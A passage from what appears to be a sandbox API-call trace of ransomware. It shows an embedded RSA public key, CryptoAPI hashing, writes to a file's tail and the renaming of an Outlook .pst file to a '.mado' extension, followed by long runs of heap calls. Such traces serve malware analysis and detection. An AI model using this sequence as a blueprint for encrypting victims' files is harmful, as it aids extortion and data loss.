KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.195] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.196] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.196] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.196] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.196] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.196] GetLastError () returned 0x0 [0205.196] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.196] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.196] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.196] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.196] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.197] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.198] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.198] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.246] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.246] CloseHandle (hObject=0x63c) returned 1 [0205.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.249] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.mado")) returned 1 [0205.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.249] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b3348 | out: hHeap=0x2c0000) returned 1 [0205.250] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0205.250] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0205.251] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.251] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 